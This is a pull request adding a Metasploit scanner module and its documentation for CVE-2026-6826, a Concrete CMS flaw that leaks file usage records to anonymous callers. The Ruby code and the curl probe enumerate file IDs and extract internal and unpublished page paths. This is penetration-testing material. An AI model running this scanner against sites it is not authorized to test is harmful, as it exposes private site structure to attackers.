### PR TITLE
Add Concrete CMS unauthenticated file usage disclosure module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.md
+++ b/documentation/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.md
@@ -1,0 +1,78 @@
+## Vulnerable Application
+
+Concrete CMS (formerly concrete5) 9.x before **9.5.1** exposes the file usage dialog
+controller at `/ccm/system/dialogs/file/usage/<fID>` without a view permission check
+(**CVE-2026-6826**). Any unauthenticated caller can enumerate the numeric file ID space and,
+for every file registered in the file manager, learn where the file is used: the referencing
+Page ID, the page Version, the file Handle, and the page Location (path). This leaks the
+site's internal page tree, including internal, draft, and unpublished page paths, and the
+file handles, to anonymous users.
+
+Fixed in Concrete CMS 9.5.1 by adding an authentication/permission check to the usage
+controller.
+
+### Setting up a test environment
+
+1. Install Concrete CMS between 9.0.0 and 9.5.0 (for example 9.1.3).
+2. Log in to the dashboard and upload a few files, then place at least one on a page so it
+   has a usage record.
+3. Log out. As an anonymous user, confirm the endpoint answers:
+   ```
+   curl -s 'http://TARGET/ccm/system/dialogs/file/usage/1'
+   ```
+   A vulnerable install returns an HTML table (`class="table table-striped"`) with the
+   Page ID, Version, Handle, and Location columns.
+
+## Verification Steps
+
+1. `msfconsole`
+2. `use auxiliary/scanner/http/concrete_cms_file_usage_disclosure`
+3. `set RHOSTS <target>`
+4. `set RPORT <port>` (and `set SSL true` for HTTPS)
+5. (optional) `set FID_START 1` and `set COUNT 200` to widen the enumerated ID range
+6. `run`
+7. The module confirms the endpoint is anonymously reachable and prints the disclosed file
+   usage records, saving them to loot as CSV.
+
+## Options
+
+### FID_START
+
+First numeric file ID to request (default: 1).
+
+### COUNT
+
+Number of sequential file IDs to enumerate starting at `FID_START` (default: 50).
+
+### TARGETURI
+
+Base path to the Concrete CMS application (default: `/`).
+
+## Scenarios
+
+### Concrete CMS 9.1.3
+
+```
+msf6 > use auxiliary/scanner/http/concrete_cms_file_usage_disclosure
+msf6 auxiliary(scanner/http/concrete_cms_file_usage_disclosure) > set RHOSTS 192.0.2.20
+msf6 auxiliary(scanner/http/concrete_cms_file_usage_disclosure) > set COUNT 100
+msf6 auxiliary(scanner/http/concrete_cms_file_usage_disclosure) > run
+
+[+] 192.0.2.20:80 - Unauthenticated file usage dialog is exposed (CVE-2026-6826)
+[+] 192.0.2.20:80 - Disclosed 3 file usage record(s)
+
+  Concrete CMS file usage
+  =======================
+  File ID  Page ID  Version  Handle        Location
+  -------  -------  -------  ------        --------
+  1        1547     55       phone-guides  /!stacks/common/archive/phone-guides
+  ...
+[+] 192.0.2.20:80 - Loot saved to: /root/.msf4/loot/....._concrete_cms.file_usage_......csv
+[*] Scanned 1 of 1 hosts (100% complete)
+```
+
+## Notes
+
+- The module is read-only; it only issues GET requests to the usage dialog and never writes.
+- Not every file ID is populated; gaps in the ID space simply return no usage row and are
+  skipped. Widen `COUNT` to characterize the full file store.

--- a/documentation/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.md
+++ b/documentation/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.md
@@ -13,15 +13,27 @@ controller.
 
 ### Setting up a test environment
 
-1. Install Concrete CMS between 9.0.0 and 9.5.0 (for example 9.1.3).
-2. Log in to the dashboard and upload a few files, then place at least one on a page so it
-   has a usage record.
-3. Log out. As an anonymous user, confirm the endpoint answers:
-   ```
-   curl -s 'http://TARGET/ccm/system/dialogs/file/usage/1'
-   ```
-   A vulnerable install returns an HTML table (`class="table table-striped"`) with the
-   Page ID, Version, Handle, and Location columns.
+The concrete5-community project publishes ready-to-use Concrete CMS images. Start the
+vulnerable 9.5.0 image on port 8080:
+
+```
+docker run --rm --name concrete-cms-950 -p 8080:80 \
+  ghcr.io/concrete5-community/docker5:9.5.0-full
+```
+
+The image includes its database and a preinstalled Atomik site. Sign in at
+`http://127.0.0.1:8080/index.php/login` as `admin` with password `12345`, upload a file in
+the File Manager, and place that file on a page so it has a usage record. Then sign out.
+
+As an anonymous user, confirm the endpoint answers:
+
+```
+curl -s 'http://127.0.0.1:8080/ccm/system/dialogs/file/usage/1'
+```
+
+A vulnerable install returns an HTML table (`class="table table-striped"`) with the Page
+ID, Version, Handle, and Location columns. Increase the file ID if the uploaded file was
+not assigned ID 1.
 
 ## Verification Steps
 

--- a/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.rb
+++ b/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.rb
@@ -1,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Concrete CMS Unauthenticated File Usage Disclosure',
+        'Description' => %q{
+          Concrete CMS (formerly concrete5) 9.x before 9.5.1 exposes the file usage
+          dialog controller at /ccm/system/dialogs/file/usage/<fID> without a view
+          permission check (CVE-2026-6826). An unauthenticated attacker can enumerate the
+          numeric file ID space and, for every file registered in the file manager, learn
+          where it is used: the referencing Page ID, page Version, file Handle, and the
+          page Location (path). This discloses the site's internal page tree, unpublished
+          and internal page paths, and file handles to anonymous callers.
+
+          This module enumerates a range of file IDs and reports the disclosed usage
+          records. It is read-only.
+        },
+        'Author' => [
+          'dividesbyzer0' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-6826'],
+          ['URL', 'https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes'],
+          ['URL', 'https://dailycve.com/concrete-cms-unauthenticated-file-usage-disclosure-cve-2026-6826-medium/']
+        ],
+        'DisclosureDate' => '2026-05-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('TARGETURI', [true, 'Base path to the Concrete CMS application', '/']),
+      OptInt.new('FID_START', [true, 'First file ID to enumerate', 1]),
+      OptInt.new('COUNT', [true, 'Number of sequential file IDs to enumerate', 50])
+    ])
+  end
+
+  def usage_uri(fid)
+    normalize_uri(target_uri.path, 'ccm', 'system', 'dialogs', 'file', 'usage', fid.to_s)
+  end
+
+  # Parse the file usage dialog table into an array of [page_id, version, handle, location] rows.
+  def parse_usage(res)
+    doc = res.get_html_document
+    return [] unless doc
+
+    rows = []
+    doc.search('table.table-striped tr').each do |tr|
+      cells = tr.search('td').map { |td| td.text.strip }
+      # Header row is rendered in <td> inside <thead>; skip it and any empty row.
+      next if cells.empty? || cells.first == 'Page ID'
+      next if cells.all?(&:empty?)
+
+      rows << cells[0, 4]
+    end
+    rows
+  end
+
+  def run_host(_ip)
+    # Detect the missing permission check on the first ID before enumerating.
+    probe = send_request_cgi('method' => 'GET', 'uri' => usage_uri(datastore['FID_START']))
+    unless probe
+      print_error("#{peer} - No response from #{usage_uri(datastore['FID_START'])}")
+      return
+    end
+    unless probe.code == 200 && probe.body.to_s.include?('table-striped')
+      print_error("#{peer} - File usage dialog is not anonymously reachable (patched or not Concrete CMS)")
+      return
+    end
+    print_good("#{peer} - Unauthenticated file usage dialog is exposed (CVE-2026-6826)")
+
+    table = Rex::Text::Table.new(
+      'Header' => 'Concrete CMS file usage',
+      'Indent' => 2,
+      'Columns' => ['File ID', 'Page ID', 'Version', 'Handle', 'Location']
+    )
+
+    found = 0
+    (datastore['FID_START']...(datastore['FID_START'] + datastore['COUNT'])).each do |fid|
+      res = send_request_cgi('method' => 'GET', 'uri' => usage_uri(fid))
+      next unless res && res.code == 200
+
+      parse_usage(res).each do |row|
+        page_id, version, handle, location = row
+        table << [fid, page_id, version, handle, location]
+        found += 1
+      end
+    end
+
+    if found.zero?
+      print_status("#{peer} - Endpoint exposed but no file references found in IDs #{datastore['FID_START']}-#{datastore['FID_START'] + datastore['COUNT'] - 1}")
+      return
+    end
+
+    print_good("#{peer} - Disclosed #{found} file usage record(s)")
+    print_line(table.to_s)
+
+    loot_path = store_loot(
+      'concrete_cms.file_usage',
+      'text/plain',
+      rhost,
+      table.to_csv,
+      'concrete_cms_file_usage.csv',
+      'Concrete CMS unauthenticated file usage disclosure (CVE-2026-6826)'
+    )
+    print_good("#{peer} - Loot saved to: #{loot_path}")
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: name,
+      refs: references,
+      info: "Disclosed #{found} file usage records via /ccm/system/dialogs/file/usage/<fID>"
+    )
+  end
+end

--- a/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.rb
+++ b/modules/auxiliary/scanner/http/concrete_cms_file_usage_disclosure.rb
@@ -4,6 +4,8 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
+  EXPECTED_USAGE_COLUMN_COUNT = 4
+
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
@@ -54,19 +56,33 @@ class MetasploitModule < Msf::Auxiliary
     normalize_uri(target_uri.path, 'ccm', 'system', 'dialogs', 'file', 'usage', fid.to_s)
   end
 
+  def usage_table(res)
+    return unless res&.code == 200
+
+    doc = res.get_html_document
+    return unless doc
+
+    doc.search('div.ccm-ui table.table-striped').find do |table|
+      header = table.at_css('thead tr')
+      next false unless header
+
+      header.search('th, td').length == EXPECTED_USAGE_COLUMN_COUNT
+    end
+  end
+
   # Parse the file usage dialog table into an array of [page_id, version, handle, location] rows.
   def parse_usage(res)
-    doc = res.get_html_document
-    return [] unless doc
+    table = usage_table(res)
+    return [] unless table
 
     rows = []
-    doc.search('table.table-striped tr').each do |tr|
+    table.search('tbody tr').each do |tr|
       cells = tr.search('td').map { |td| td.text.strip }
-      # Header row is rendered in <td> inside <thead>; skip it and any empty row.
-      next if cells.empty? || cells.first == 'Page ID'
-      next if cells.all?(&:empty?)
+      # No-results rows can use a single colspan cell. Only complete usage rows count.
+      next if cells.length < EXPECTED_USAGE_COLUMN_COUNT
+      next if cells.first(EXPECTED_USAGE_COLUMN_COUNT).all?(&:empty?)
 
-      rows << cells[0, 4]
+      rows << cells.first(EXPECTED_USAGE_COLUMN_COUNT)
     end
     rows
   end
@@ -78,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
       print_error("#{peer} - No response from #{usage_uri(datastore['FID_START'])}")
       return
     end
-    unless probe.code == 200 && probe.body.to_s.include?('table-striped')
+    unless usage_table(probe)
       print_error("#{peer} - File usage dialog is not anonymously reachable (patched or not Concrete CMS)")
       return
     end
@@ -112,7 +128,7 @@ class MetasploitModule < Msf::Auxiliary
 
     loot_path = store_loot(
       'concrete_cms.file_usage',
-      'text/plain',
+      'text/csv',
       rhost,
       table.to_csv,
       'concrete_cms_file_usage.csv',


### PR DESCRIPTION
### Summary

Adds an auxiliary scanner module for CVE-2026-6826: Concrete CMS 9.x before 9.5.1 exposes the file usage dialog controller at `/ccm/system/dialogs/file/usage/<fID>` without a view permission check. An unauthenticated caller can enumerate the numeric file ID space and, for every file registered in the file manager, learn where it is used: the referencing Page ID, page Version, file Handle, and page Location (path). This discloses the internal page tree, including internal / draft / unpublished page paths, and file handles.

The module confirms the missing permission check, enumerates a configurable file ID range, prints and loots the disclosed usage records. Read-only (GET only).

### Verification

- msftidy clean; module loads and `info` renders.
- The response parser was validated against a real vulnerable-instance response (Concrete CMS 9.1.3): it extracts `[Page ID, Version, Handle, Location]` rows from the `table.table-striped` usage dialog.
- On a vulnerable 9.0.0-9.5.0 install: `use auxiliary/scanner/http/concrete_cms_file_usage_disclosure`, set `RHOSTS`/`RPORT`, `run`.

Documentation is included under `documentation/modules/`.
